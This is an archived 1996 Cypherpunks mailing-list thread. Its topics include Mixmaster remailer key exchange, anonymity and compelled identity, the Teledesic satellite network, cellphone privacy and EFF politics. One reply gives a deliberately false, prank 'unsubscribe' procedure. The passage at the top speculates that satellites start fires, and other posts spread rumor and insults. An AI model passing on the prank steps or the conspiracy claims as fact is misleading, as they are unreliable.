>convenient for clearing certain properties if you're putting in a new
>freeway or subway tunnel, and you don't want to have to fight with all
>the riffraff who might be resistant to getting up and moving.
>
>So how do you light all those fires? Do it the hard way - plant the
>stuff (6,000-plus times!) and hope nobody catches your guys, or light
>'em up from satellites, using "new experimental" focused energy. Gosh,
>Mr. Bill, would they do that? Guess it depends on what you're willing to
>believe. Remember what Tom Wolfe wrote about? "The reason the folks on
>the East Coast (circa 1700's) were such easy victims for the pirates was
>the fact that they couldn't comprehend just how vicious and ruthless the
>pirates really were." (quote approximate).
>
>

For some reason I find seeing satellites flying in formation rather disturbing. The classic 3-4-5 right triangle makes somebody's math easier, I'm sure. I have watched the sky for 20 years and seeing that pattern glide across the sky made me wonder just what the shuttle is doing up there.

How many satellites have been placed in orbit? How precise are their positions?

--j

From attila at primenet.com Sat Sep 7 23:05:13 1996
From: attila at primenet.com (attila)
Date: Sun, 8 Sep 1996 14:05:13 +0800
Subject: take the pledge
Message-ID: <199609080352.VAA15611@InfoWest.COM>

Alright! it's a genuine PerryGram!
I'll take the pledge; I've never been able to answer Sternlight without being significantly more offensive than usual! attila -- one of the few things we all share: the utter, corrosive contempt for our elected officials. -------------------------------------------------------- In, on 07/19/96 at 12:06 PM, "Perry E. Metzger" said: =Subject: take the pledge =Look, folks, we all know that 99% of what David Sternlight posts is =garbage. Why don't we all pledge not to answer any of his posts, and =then he'll go away. If necessary, someone can be appointed to post a =weekly "the views expressed by David are junk and we are deliberately =not replying to them directly" message. =David has plenty of places to argue with the wind. We don't need to =add this one. =I'd like to ask people to publically pledge that they will not reply =to David's messages. This is such a pledge. =Perry From paul at fatmans.demon.co.uk Sat Sep 7 23:26:49 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sun, 8 Sep 1996 14:26:49 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! Message-ID: <842145895.372.0@fatmans.demon.co.uk> > I really need help unsubscribing from the Cypherpunks list! it is imperative! > It is Imperrative that you do the following to ubsubscibe umself luddite. Get 3 other friends to send in messages to majordomo at toad.com with the line subscribe cypherpunks (their email address here) in the message then once they have subscribed send a message to cypherpunks at eff.org with the following in it: Authorise: (email 1) (email 2) (email 3) END replacing (email x) with their email addresses. then send a message to majordomo at toad.com with the line: unsubscribe cypherpunks (your email) and you will be taken off the 3 friends email addresses act as a security protocol to ensure you cannot be maliciously removed by someone else.. they will then have to repeat the exercise with 3 friends each of their own to unsubscribe themselves and so on down the chain... 
good luck.

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From gimonca at skypoint.com Sat Sep 7 23:47:06 1996
From: gimonca at skypoint.com (Charles Gimon)
Date: Sun, 8 Sep 1996 14:47:06 +0800
Subject: Another Namespace Collision
Message-ID:

http://www.blacknet.cz

***********************************************************************
Wild new Ubik salad dressing, not     | gimonca at skypoint.com
Italian, not French, but an entirely  | Minneapolis MN USA
new and different taste treat that's  | http://www.skypoint.com/~gimonca
waking up the world!                  | A lean, mean meme machine.
***********************************************************************

From varange at crl.com Sat Sep 7 23:50:28 1996
From: varange at crl.com (Troy Varange)
Date: Sun, 8 Sep 1996 14:50:28 +0800
Subject: What the NSA is patenting
In-Reply-To: <199609071627.JAA01473@mail.pacifier.com>
Message-ID: <199609080449.AA28514@crl11.crl.com>

Burning the floppy would seem to solve the problem. Lock sensitive data in RAM away from disks except for burnable floppies. I guess linux can be configured to keep sensitive data in a RAM filesystem, keeping it from being synced or flushed.

From Adamsc at io-online.com Sat Sep 7 23:52:19 1996
From: Adamsc at io-online.com (Adamsc)
Date: Sun, 8 Sep 1996 14:52:19 +0800
Subject: talker
Message-ID: <19960908045041953.AAA106@IO-ONLINE.COM>

On Sat, 07 Sep 1996 21:52:25 EDT, Floyd W Odom wrote:

> I am doom13.
If there is anyone out there who is a hacker or >would like to be one you can talk to me and find out stuff like cracking. >Just drop a message at doom13 at juno.com. Hmmmm... Want to bet our other friend at juno.com sent him? I might just end up killfiling juno.com... Obviously a low-IQ area of the net. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From zachb at netcom.com Sat Sep 7 23:52:40 1996 From: zachb at netcom.com (Z.B.) Date: Sun, 8 Sep 1996 14:52:40 +0800 Subject: talker In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com> Message-ID: On Sat, 7 Sep 1996, Floyd W Odom wrote: > Dear Whoever, > > I am doom13. If there is anyone out there who is a hacker or > would like to be one you can talk to me and find out stuff like cracking. > Just drop a message at doom13 at juno.com. > > Doom13 > ....another pathetic entry for my killfile. When will these people learn? --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From Adamsc at io-online.com Sat Sep 7 23:55:43 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 8 Sep 1996 14:55:43 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! Message-ID: <19960908044715187.AAA73@IO-ONLINE.COM> On Sat, 7 Sep 1996 16:46:40 -0500, kickboxer wrote: >I really need help unsubscribing from the Cypherpunks list! it is imperative! We could probably just condense that message by removing everything after the fourth word without losing much... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. 
* Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre

From jwilk at iglou.com Sun Sep 8 00:11:52 1996
From: jwilk at iglou.com (Blake Wehlage)
Date: Sun, 8 Sep 1996 15:11:52 +0800
Subject: talker
Message-ID:

> I am doom13. If there is anyone out there who is a hacker or
>would like to be one you can talk to me and find out stuff like cracking.
>Just drop a message at doom13 at juno.com.

OK.... I'M sick of this spamming..... ITS CYPHERpunks, NOT CYBERpunks.

ps.... u don't 'ask someone to be a hacker, u have to find it out ur self....

one more thing... how come all these 'spamers' are from juno... and one make this connect too???

my very own 13 year old $0.02

==========================================
Blake Wehlage
Goto: http://members.iglou.com/jwilk

From jamesd at echeque.com Sun Sep 8 00:12:08 1996
From: jamesd at echeque.com (James A. Donald)
Date: Sun, 8 Sep 1996 15:12:08 +0800
Subject: Teledesic, the censored internet in the sky.
Message-ID: <199609080445.VAA00370@dns1.noc.best.net>

Teledesic, the censored internet in the sky.

Late last year the organized violence monopolies of the world voted to give Bill Gates 400 Megahertz of bandwidth, at the same frequency in each monopoly. I would guesstimate the value of this grant to be around ten billion dollars.

Don't run out and buy Microsoft shares. When I said Bill Gates, I meant Bill Gates. I did not mean Microsoft.

Bill Gates intends to build an internet in the sky, eight hundred satellites in low earth orbit, each of them with big bandwidth connections to its nearest neighbors, and each with a four hundred megahertz connection to each of many squares of ground underneath it.

What caused the collected killers of the world to show such unanimous generosity towards Bill Gates?
Bill Gates proposed a network that would be completely censorable. He will not sell pipes to his space backbone, he will sell pipes from a particular rectangle on the ground to its space backbone. You would buy a right to connect from any place in a single small area, not any a right to connect from any place in the world, and Bill Gates would only sell such rights to government approved organizations, which would then presumably resell connections to private individuals -- connections that would first run through government controlled pipes to check for politically incorrect bits before they reached Bill Gates' sky backbone. Of course we should not condemn him too harshly for this: He needs approval from Singapore, Iran, France, Germany, Communist China, and the like, in order to get a single uniform world wide frequency band, and would be unlikely to get it for any reasonable proposal. The government pipes in his proposal are as useless as wheels on a fish, because he promises his ground stations will be quite cheap. Therefore private citizens who are not permitted direct access to his internet in the sky will feel the impact of tyranny immediately in their wallets. Bill Gates internet in the sky will provide short and near constant latency, therefore telephone connections running through it should be pretty good, whereas existing internet phone sucks mightily. Teledesic is promised to come on line in 2001, though we have seen how Microsoft meets schedules in the past. I conjecture 2006. I also predict that once the scheme is securely in place, and jamming it becomes painful, Bill Gates will find a thousand ways to chisel the government monopoly middlemen in his proposal. I would guess that Motorola's less ambitious Iridium project will only be a year or two late, but it has little potential to revolutionize the world the way Bill Gates proposal has. 
I expect once the scheme is in place, the government monopolies in Gate's plan will be under attack both from above and from below. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From attila at primenet.com Sun Sep 8 00:31:13 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 15:31:13 +0800 Subject: talker [is illiterate...] In-Reply-To: <199609080340.XAA19752@jekyll.piermont.com> Message-ID: <199609080526.XAA17303@InfoWest.COM> Perry, just look at the gall of the *illiterate* jerk; this was his reply to me: = You know man I am a profesional so don't reply to me = as a novice or anything. I have been doing this since I = wuz 12. And I'm not young for my age I know alot = about hacking and FYI there's alot you could learn from = me so don't think 23 is a young age pal. = = Doom13 = takes all kinds. that's OK, he'll make it to my filter which dumps it to: in-assholes->/dev/null -------------------- In <199609080340.XAA19752 at jekyll.piermont.com>, on 09/07/96 at 11:40 PM, "Perry E. Metzger" said: = Floyd W Odom writes: = > I am doom13. If there is anyone out there who is a hacker or > = > would like to be one you can talk to me and find out stuff like = > cracking. > Just drop a message at doom13 at juno.com. = Are you the same jerk who was posting a week ago? -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From unicorn at schloss.li Sun Sep 8 00:50:36 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 8 Sep 1996 15:50:36 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: On Fri, 6 Sep 1996, Timothy C. 
May wrote:

> At 6:08 PM 9/6/96, stewarts at ix.netcom.com wrote:
>
> >is done because of the Great Drug Hysteria, but I suspect part of it
> >is that pay phone companies don't make money receiving calls,
> >so they don't want to tie up their phones doing that; perhaps if
> >they charged money to receive calls as well as initiate them,
> >they'd be willing to receive calls?
>
> I am about to start worrying about "junk phone calls" more so than I have
> been. I just bit the bullet and bought a digital cellular phone, with a
> nifty rate plan called Digital Flex: I get unlimited free airtime from 7
> p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south
> of Salinas to north of Santa Rosa and as far east as the Central Valley. In
> other words, the entire Bay Area and outlying communities. I can send and
> receive calls over this entire region, from anywhere in the region (of
> course), without any charges.
>
> The downside is that calls _from_ or _to_ my phone during "business" hours
> are charged 42 cents a minute, airtime (tying up a channel and all), plus
> whatever other fees may be applicable at each end. Thus, every "junk call"
> I get trying to get me to buy aluminum siding, or to vote Democratic, or to
> switch my long-distance carrier (!), costs me a minimum of 42 cents,
> depending on how fast I can realize who they are and get rid of them ("Let
> me forward you to Jim Bell's AP hotline...").

I suggest doing as I do, that is giving the number to no one at all but forwarding a public number to the cell phone when you need to. "Unlimited forward" allows you to call your own number from anywhere and change forwarding details. Quite useful.

> possibilities if this is extended to cover other such areas). The "Digital
> Flex" plan from Cellular One is $20/mo for the basic plan, and then $15/mo
> on top of that for the unlimited evenings and weekends use. (This could
> easily save me the amount I often spend in a month just yakking with
> friends and girlfriends who live over the hill in the Valley.)

Many digital phones have caller ID which you could use to screen for "urgent" calls when the time is pricy. You might also consider giving folks a beeper number for "urgent calls" and you could then call your voice mail from your cellphone to see if you wish to bother calling back. This has the added advantage of preventing the tracking of your movement by determining which "cell" your phone happens to be on at the moment (phones talk to cells when on but not talking).

> --Tim May
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From unicorn at schloss.li Sun Sep 8 01:04:08 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Sun, 8 Sep 1996 16:04:08 +0800
Subject: TWA 800 - Friendly Fire?
In-Reply-To: <199609062048.NAA32689@abraham.cs.berkeley.edu>
Message-ID:

On Fri, 6 Sep 1996, John Anonymous MacDonald wrote:

> The latest rumor.
>
> The message came to me from a man who was Safety Chairman for the
> Airline Pilots Association for many years and he is considered an
> expert on safety. He would not ever spread idle rumor. In short,
> he is usually quite certain before saying anything!

Feel free to cite his credentials AFTER you disclose his name.
:)

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From unicorn at schloss.li Sun Sep 8 01:14:49 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Sun, 8 Sep 1996 16:14:49 +0800
Subject: Deleted Message (fwd)
Message-ID:

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

---------- Forwarded message ----------
Date: Sat, 7 Sep 96 16:56:55 -24000
From: MAILER-DAEMON at mqg-smtp3.usmc.mil
To: unicorn at schloss.li
Subject: Deleted Message

To: "Jon Lebkowsky"
From: MQG-SMTP3 at USMC_MASTERINET@Servers[]
Subject: Re: What is the EFF doing exactly?

Message in Transport deleted by: ADMINISTRATOR at USMC_MASTERINET@Servers

From unicorn at schloss.li Sun Sep 8 01:15:03 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Sun, 8 Sep 1996 16:15:03 +0800
Subject: Deleted Message (fwd)
Message-ID:

Cute eh?

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

---------- Forwarded message ----------
Date: Sat, 7 Sep 96 17:00:49 -24000
From: MAILER-DAEMON at mqg-smtp3.usmc.mil
To: unicorn at schloss.li
Subject: Deleted Message

To: "Vladimir Z. Nuri"
From: MQG-SMTP3 at USMC_MASTERINET@Servers[]
Subject: Re: What is the EFF doing exactly?

Message in Transport deleted by: ADMINISTRATOR at USMC_MASTERINET@Servers

From unicorn at schloss.li Sun Sep 8 01:15:05 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Sun, 8 Sep 1996 16:15:05 +0800
Subject: Voluntary Disclosure of True Names
In-Reply-To: <199609051749.KAA12335@netcom20.netcom.com>
Message-ID:

On Thu, 5 Sep 1996, Vladimir Z. Nuri wrote:

>
> TCM
> >>I think cpunks should hold the view that communication is a matter
> >>of mutual consent between sender and receiver. if a receiver says,
> >>"I don't want any anonymous messages", then should be able to block them.
> >
> >But this is precisely what nearly all of us have been arguing. Namely, that
> >the issue of anonymity vs. providing of True Names, is a matter of
> >_contract_ between parties, not something the government is justified in
> >sticking its nose into.
> [...]
> I have seen it repeated here often that somehow anonymity is some kind
> of a "right" that one should have in all kinds of different & important
> transactions, not merely on "cyberspace debate societies". I see
> here frequently the implication that *private*entities* that want to
> enforce identity in their own transactions are somehow implementing
> a corrupt, orwellian system. it sounded to me like that was all
> Dyson was advocating.

"I have seen it repeated here often that somehow compelled identity is some kind of a 'right' that one should have in all kinds of different & important transaction, not merely on 'cyberspace debate societies.' I see here frequently the implication that *private*entities* that want to enforce compelled identity in their own transactions are somehow implementing a corrupt, orwellian system."

(That put it into perspective for you "Vlad?")

> "this is all we really want". what about situations
> where the government requires you to give a physical identity for
> some kind of a license etc? do you think there are no such valid
> situations?

You are twisting, "Vlad." If you really think that the issue is one of what specific times government can demand anonymous transactions you overestimate the role of government as well as the ability to demand such transactions on a per situation rather than "as a whole" basis.

For example. A friend of mine has never had a social security number or a drivers license with his real name on it. He has effectively had nothing but anonymous transactions with anyone who thought that by asking him for a SSN or driver's license they were getting identity credentials. His basis is philosophical, not criminal. I might add that he lives quite normally, works for a big mainstream company, and pays taxes.
Every once in a while he switches his credentials around a bit to avoid paper trailing.

Please, if you can, point out the harm he is inflicting. You can't. There is none. The harm you can identify is the classic "but it might be used for... [insert nastiness in vogue this week here]"

> is there any role for a government whatsoever in
> CryptoAnarchist Utopia and if so, is there any situation in which
> demanding physical identity is reasonable?

It is reasonable for any private parties to refuse to do business with or otherwise associate with parties who refuse to divulge their identity. Government in a CryptoAnarchist Utopia will have a very hard time doing business with anyone if they make this a requirement I think.

> >No, Dyson said "Therefore I would favor allowing anonymity -- with some
> >form of traceability only under terms considerably stronger than what are
> >generally required for a wiretap."
> >
> >This implies a role for government, and concomitant restrictions on related
> >anonymity technologies, to provide traceability. So much for mutual
> >agreement between sender and recipient.
>
> it's clear Dyson hasn't totally thought out her position on anonymity.
> imho you are reading too much into her existing positions. because of your
> government paranoia, you assume that when someone says they want
> traceability, they are implying they want the government to
> enforce it in all situations.

Tell me "Vlad," if government won't, who will? I submit that it is impossible to enforce compelled identity other than through government. I also submit that to do it you have to create a registration process for all mediums. Pay phones, ISPs, private leaflets, cash... etc... etc. So long as cash and payphones exist, (or so long as cash and pre-paid cellular exists) so will anonymous transactions. Again, the question is, what are you going to do to prevent, e.g., me, "Black Unicorn" from publishing as I do now?
> >(I have nothing against senders and recipients agreeing to use the services
> >of some third party in providing ultimate traceability. I'm not wild about
> >the U.S. Government being this third party, paid for by tax money, but so
> >long as it is not required, it's a minor concern to me.
>
> that's what something like what Dyson has been referring to would suggest
> to me. that is, that's exactly the system she sounded like she was
> loosely advocating.

Crap. Such a system exists today. It's called the "filter." If you don't want to transact with anonymous people, then IGNORE them. Why impose compelled disclosure on everyone?

[Yadda Yadda about Copyright and own-back-patting about "subtlies" that others will miss deleted.]

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From gsi at juno.com Sun Sep 8 01:45:15 1996
From: gsi at juno.com (floyd w odem)
Date: Sun, 8 Sep 1996 16:45:15 +0800
Subject: No Subject
Message-ID: <19960907.013714.12478.0.gsi@juno.com>

If you would like to get your hands on the 96 hackers catalog it's here
and if you want to have it :
to get it through the snail mail system send 1.00 to the address below
to get it through e-mail send .50 to the address below

Patrick Cummings
GSI
6302 Maple st.
omaha,ne 68104

for more information write to gsi at juno.com

From jf_avon at citenet.net Sun Sep 8 01:59:41 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Sun, 8 Sep 1996 16:59:41 +0800
Subject: (Fwd) Teledesic, the censored internet in the sky.
Message-ID: <9609080703.AA27267@cti02.citenet.net>

-----BEGIN PGP SIGNED MESSAGE-----

to: Bill Gates, Microsoft Corp.
From: jf_avon at citenet.net
Date: 8 sept 1996
Cc.: cypehrpunks at toad.com

Mr. Gates

Could you please enlighten me about this proposed system and about the veracity of the following information?
Thanks

jfa

- --
Jean-Francois Avon, Montreal QC Canada
DePompadour, Societe d'Importation Ltee
Limoges porcelain, silverware and crystal
JFA Technologies
R&D consultants: physicists technologists and engineers.
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

- ------- Forwarded Message Follows -------
Date: Sat, 07 Sep 1996 06:22:47 -0700
To: cypherpunks at toad.com
From: "James A. Donald"
Subject: Teledesic, the censored internet in the sky.

Teledesic, the censored internet in the sky.

Late last year the organized violence monopolies of the world voted to give Bill Gates 400 Megahertz of bandwidth, at the same frequency in each monopoly. I would guesstimate the value of this grant to be around ten billion dollars.

Don't run out and buy Microsoft shares. When I said Bill Gates, I meant Bill Gates. I did not mean Microsoft.

Bill Gates intends to build an internet in the sky, eight hundred satellites in low earth orbit, each of them with big bandwidth connections to its nearest neighbors, and each with a four hundred megahertz connection to each of many squares of ground underneath it.

What caused the collected killers of the world to show such unanimous generosity towards Bill Gates?

Bill Gates proposed a network that would be completely censorable. He will not sell pipes to his space backbone, he will sell pipes from a particular rectangle on the ground to its space backbone. You would buy a right to connect from any place in a single small area, not a right to connect from any place in the world, and Bill Gates would only sell such rights to government approved organizations, which would then presumably resell connections to private individuals -- connections that would first run through government controlled pipes to check for politically incorrect bits before they reached Bill Gates' sky backbone.
Of course we should not condemn him too harshly for this: He needs approval from Singapore, Iran, France, Germany, Communist China, and the like, in order to get a single uniform world wide frequency band, and would be unlikely to get it for any reasonable proposal.

The government pipes in his proposal are as useless as wheels on a fish, because he promises his ground stations will be quite cheap. Therefore private citizens who are not permitted direct access to his internet in the sky will feel the impact of tyranny immediately in their wallets.

Bill Gates' internet in the sky will provide short and near constant latency, therefore telephone connections running through it should be pretty good, whereas existing internet phone sucks mightily.

Teledesic is promised to come on line in 2001, though we have seen how Microsoft meets schedules in the past. I conjecture 2006.

I also predict that once the scheme is securely in place, and jamming it becomes painful, Bill Gates will find a thousand ways to chisel the government monopoly middlemen in his proposal.

I would guess that Motorola's less ambitious Iridium project will only be a year or two late, but it has little potential to revolutionize the world the way Bill Gates' proposal has.

I expect once the scheme is in place, the government monopolies in Gates' plan will be under attack both from above and from below.

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----

From zachb at netcom.com Sun Sep 8 02:00:09 1996
From: zachb at netcom.com (Z.B.)
Date: Sun, 8 Sep 1996 17:00:09 +0800
Subject: talker [is illiterate...]
In-Reply-To: <199609080526.XAA17303@InfoWest.COM>
Message-ID:

On Sun, 8 Sep 1996, attila wrote:

> Perry, just look at the gall of the *illiterate* jerk; this
> was his reply to me:
> [snip]
>
> takes all kinds. that's OK, he'll make it to my filter which
> dumps it to:
>
> in-assholes->/dev/null

You mean that you actually *wait* for a reply before killfiling him? As soon as I see a message here asking about hacking or cracking or other stuff like that, it's wham bam /dev/null, ma'am! :)

---
Zach Babayco
zachb at netcom.com <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127

From loki at infonex.com Sun Sep 8 02:04:52 1996
From: loki at infonex.com (Lance Cottrell)
Date: Sun, 8 Sep 1996 17:04:52 +0800
Subject: forward secrecy in mixmaster
In-Reply-To: <199609061703.SAA00170@server.test.net>
Message-ID:

At 10:03 AM -0700 9/6/96, Adam Back wrote:
>Since Peter Allen's discussion of mixmaster, I started doing something
>I'd been thinking of for a while, since noticing that it was on the
>mixmaster to-do list months ago (ie there is unfinished source to do
>this): direct socket connections and diffie-hellman key exchange for
>forward secrecy.

The code is still out there to look at. I warn you though, it is steaming horse manure. ;)

>I wrote the socket stuff yesterday evening, didn't take too long as
>socket programming is something I've done lots of.
>
>Now comes what do you actually send down the sockets.
>
>Question for Lance, and any others who were involved in mixmasters
>implementation: what did you have in mind as a way of negotiating the
>DH keys?
>
>I notice that mixmaster generates a DH key and stores it in file
>`DH.mix', but that this is not (as far as I can see from the source)
>included in the remailers public key block.

No, it is not in the key block. It would be passed during the negotiation.
>(A couple of comments as an aside: I think that you should be able to
>have a much smaller generator without loss of security, this should
>reduce the overhead of a DH key exchange. Using 3 even I think is
>safe, without any extra precautions on prime generation. You can even
>go to 2, with a few precautions (PGPfone does this). Comment #2 I
>think 1024 may be a bit small, I don't have any figures handy for
>relative security of DH key lengths, but PGPfone offers 4096 bit DH
>for instance. Does rsaref have limits on prime lengths for DH, the
>same as it does for RSA?).

Call me paranoid. After asking and reading around I decided I wanted to cover my bases. It looked like, in the future, it might be easier to break with small generators. This is not a critical decision though. I too would have liked it longer, but using RSAREF I am limited. That is one of the reasons I have each remailer create its own DH modulus, and allow it to change it periodically.

>There are lots of options for DH public key negotiation.
>
>First option is whether you have a common prime and generator for all
>remailers or not. If you have a common prime, accusations of the
>prime being `cooked' (chosen to have a weakness) can be mitigated by
>using a deterministic generation method based on the hash of a known
>phrase (a Jefferson quote perhaps), or PI or whatever.
>
>A common modulus may offer a fatter target for attack (for some
>precomputation attacks), but with large enough keys this probably
>isn't that bad, as there aren't that many mixmasters anyway.
>
>With a common modulus there is DH key negotiation needed, just include
>it with the source.

You have spelled out why I like having each remailer use its own modulus.
>For different moduli for each remailer, there are more options:
>
>a) include the DH key signed by the RSA key in the remailers public key
> (may break backwards compatibility with existing versions of
> mixmaster)
>
>b) send the DH public key at the start of each session
>
>c) send the DH public key on request

I chose C. In the protocol I developed the sending remailer (A) sends a hash of the DH modulus to the receiving remailer (B). If B has it, they use it. If not, A sends it. I use the modulus from A because it has the stake in privacy. B will take messages from anyone, but A wants to know the messages it has go to the correct other remailer B.

>There is also a question of which key do you use, the sender remailers
>or the recipient remailers.
>
>Negotiating DH public keys during execution also opens the possibility
>for periodic re-keying.
>
>That's the end of my thoughts on direct socket mixmaster.
>
>Next message is some thoughts on non-interactive forward secrecy
>protocols.
>
>Adam

Here is a description of the protocol I wrote many months ago. The message assumed the above discussion of distributing the DH modulus.

--------------Start Old Message--------------

It is too bad that I was never able to debug my socket code. It is more or less all done. The advantage of the socket code is that it allows the message to be super-encrypted with a DH negotiated key which provides forward security for intercepted messages. There is a built in authentication for the DH (against MITM attacks) in the RSA key used to encrypt the remailer message to the next remailer. I can send the code I wrote to anyone on demand (within the US of course).

This basically pushes the key authentication job onto the original sender where it belongs. The key ID (16 byte fingerprint) is visible in the clear in the header of the message remailer A is about to send to remailer B. Remailer A either has the key corresponding to that fingerprint, or it requires remailer B to send it the key.
Remailer B must have the key or it would not be able to read the message anyway. A different RSA key can not be sent because of the strength of the MD5 fingerprint.

Remailer A sends its DH key half to B along with a challenge number, all encrypted under B's RSA key. Return of the challenge number along with B's DH key half, completes the authenticated exchange. The second half could also be encrypted with a 3DES key provided along with the challenge number if desired.

The whole point of all this is that if the message is intercepted and presented to B with a demand to decrypt it, B will be unable to comply, even if it wished to.

-Lance

--------------End Old Message--------------

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
--Nietzsche
----------------------------------------------------------

From proff at suburbia.net Sun Sep 8 03:02:35 1996
From: proff at suburbia.net (Julian Assange)
Date: Sun, 8 Sep 1996 18:02:35 +0800
Subject: LACC: Re: What is the EFF doing exactly?
In-Reply-To: <32303FDA.493B@hydra.acs.uci.edu>
Message-ID: <199609080749.RAA01948@suburbia.net>

> Julian Assange wrote:
> > Certain members of the EFF board seem to be politically naive. The
> > rational, intelligent lobbyist will always see both sides of the
> > argument. Presenting both sides of the argument to the world at large
> > is another matter altogether. You should only present both sides of the
> > argument to the inner policy tactics personnel only in order to formulate
> > policy and create defences for the weaknesses in your position. To the
> > outside world only ever sees a united front. This is basic politics.
>
> This is certainly the way most people in political roles handle things,
> and it is certainly an effective way of handling simple-minded people.
>
> However, it is one thing I find very difficult to respect.

Respect or not, if your team is small and the field is large, and everyone else is playing gridiron, then don't expect to prove anything but your stupidity by playing cricket.

> How many of the world's stupid policies have been enacted, because
> someone decided to present only one side of an issue, realized it was
> "the wrong side", and felt they couldn't later change their mind for the
> better - because they presented the issue as overly black-and-white
> initially?

I agree, however you are confusing large parties, so dominant as to form government and policy at whim with those that represent a particular cause or interest group. The EFF falls into the latter category. Its goals are relatively narrow, its membership tiny. Such a small group, fighting an under-resourced battle against powerful, conservative interests does not need, and should not espouse the arguments of those who seek to destroy it.

When canoeing up a waterfall, one does not need to paddle backwards 50% of the time in order to be "fair".

--
"Of all tyrannies a tyranny sincerely exercised for the good of its victims
may be the most oppressive. It may be better to live under robber barons
than under omnipotent moral busybodies. The robber baron's cruelty may
sometimes sleep, his cupidity may at some point be satiated; but those who
torment us for our own good will torment us without end, for they do so with
the approval of their own conscience." - C.S. Lewis, _God in the Dock_
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union |
|proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = |
|proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+

From whgiii at amaranth.com Sun Sep 8 03:14:18 1996
From: whgiii at amaranth.com (William H. Geiger III)
Date: Sun, 8 Sep 1996 18:14:18 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To:
Message-ID: <199609080818.DAA09824@mailhub.amaranth.com>

In , on 09/08/96 at 10:14 AM, Enzo Michelangeli said:

>On Sat, 7 Sep 1996, Hallam-Baker wrote:

>> There is a massive difference between anonymous speech and anonymous
>> transactions. Anonymous speech can create problems (defamation etc.)
>> but in the main these are not problems the courts are particularly
>> good at dealing with.

>Perhaps, but defamation is an issue that can't be ignored either,
>especially if one tries to build systems based on reputation.

Actually it can. :)

There are already checks and balances in dealing with defamation.

Take the following example:

I post a message stating that Phil Zimmermann is a @#$! and that PGP is full of holes.

The immediate response I would receive from the group would be some rather nasty flames, a couple of questions, most would ignore. Because Phil has a much greater reputation than I do such a blatant defamation would do my reputation much harm while doing his little or no harm. It may actually improve his reputation by the many follow up posting re-affirming his good reputation and his quality product. The only way I could get away with such a message would be to back it up with some strong proof and the support of others with equal or greater reputation as Phil.

Now if I anonymously post the same message.
The results would be the same as above only no one but the truly "net clueless" would pay any attention to the message. It would be seen as a "troll" and be dealt with accordingly. Once again no damage has been done to Phil's reputation.

Now where things get interesting is when the roles are reversed.

Say Phil posts a message that I am a @#$@%!!! and my product is full of holes and that I am really a NSA stooge.

Many at first would take Phil's word at face value because his reputation is much better than mine. It is only my fault that my reputation is not equal or greater than his. Because of this I now have two choices, I can stay and fight for the hearts and minds of the group or I can pack up my toys and go home.

Say I decide to fight. After much work, & many messages I prove that Phil's statements are untrue & manage to convert the group to my side. My reputation has now been greatly enhanced and Phil's reputation has suffered.

In the current system if one repetitively posts slander to a group his reputation will be destroyed beyond all repair. There is a genuine disincentive against slander in a system built on reputation. No additional "forces" are needed.

The addition of libel laws would actually hurt such a system. The threat of a libel suit could be used to inhibit debate on a topic or questioning of one's reputation.

--
-----------------------------------------------------------
William H. Geiger III http://www.amaranth.com/~whgiii
